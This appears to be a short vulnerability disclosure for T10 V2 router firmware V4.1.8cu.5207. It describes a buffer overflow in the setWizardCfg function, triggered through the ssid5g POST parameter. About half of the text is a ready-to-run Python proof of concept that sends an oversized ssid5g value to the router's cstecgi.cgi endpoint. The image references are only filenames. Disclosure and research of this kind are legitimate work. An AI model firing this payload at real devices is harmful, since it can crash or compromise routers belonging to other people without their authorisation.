T10 V2_Firmware V2_V4.1.8cu.5207
In the T10 V2_Firmware V2_V4.1.8cu.5207 firmware has a buffer overflow vulnerability in the setWizardCfg
function. The v68
variable receives the ssid5g
parameter from a POST request. However, since the user can control the input of ssid5g
, the strcnpy
can cause a buffer overflow vulnerability.
image-20240902132027948
image-20240902131826046
import requests
url = "<http://127.0.0.1/cgi-bin/cstecgi.cgi>"cookie = {"Cookie":"SESSION_ID=2:1721039211:2"}
data = {
"topicurl":"setWizardCfg",
"cloneMac":"11:22:33:44:55",
"ssid5g":"b"*0x1000,
}
response = requests.post(url, cookies=cookie, json=data)
print(response.text)
print(response)
image-20240721015356613